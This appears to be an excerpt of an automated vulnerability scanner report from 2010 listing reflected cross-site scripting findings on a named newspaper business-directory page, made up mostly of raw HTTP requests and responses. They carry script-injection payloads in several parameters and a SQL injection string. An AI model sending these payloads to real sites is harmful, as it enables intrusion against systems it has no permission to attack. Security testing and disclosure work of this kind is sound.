GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837e5675"><script>alert(1)</script>0e693292606de819f&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91530
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCCSTRAT=LGDDEGAAEHBKNPKDPEFJIDKA; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsD" value="125-526018,125-526144,125-529057,125-567748,125-526023,125-555190,125-559612,125-555175,125-554984,125-547837e5675"><script>alert(1)</script>0e693292606de819f">
...[SNIP]...

4.281. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsD parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsD request parameter is copied into the HTML document as plain text between tags. The payload 43607<script>alert(1)</script>4c4a9ad094f was submitted in the sLsIdsD parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-54783743607<script>alert(1)</script>4c4a9ad094f&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:35:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-54783743607<script>alert(1)</script>4c4a9ad094f&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-
...[SNIP]...

4.282. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsE request parameter is copied into the HTML document as plain text between tags. The payload dad62<script>alert(1)</script>0d60a4ab885 was submitted in the sLsIdsE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618dad62<script>alert(1)</script>0d60a4ab885&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:36:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618dad62<script>alert(1)</script>0d60a4ab885&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-
...[SNIP]...

4.283. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fa3e"><script>alert(1)</script>529963bd5f4fe3b35 was submitted in the sLsIdsE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-5296186fa3e"><script>alert(1)</script>529963bd5f4fe3b35&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91532
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACCRTTDT=FKDHDNGAOPDIOLAFMKBFNKPJ; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIdsE" value="125-547750,125-548054,125-525923,125-494906,125-531825,125-550469,125-567828,125-490106,125-566918,125-5296186fa3e"><script>alert(1)</script>529963bd5f4fe3b35">
...[SNIP]...

4.284. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIdsF parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIdsF request parameter is copied into the HTML document as plain text between tags. The payload 2f320<script>alert(1)</script>c33e141db59 was submitted in the sLsIdsF parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-5568702f320<script>alert(1)</script>c33e141db59&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:37:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-5568702f320<script>alert(1)</script>c33e141db59&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-
...[SNIP]...

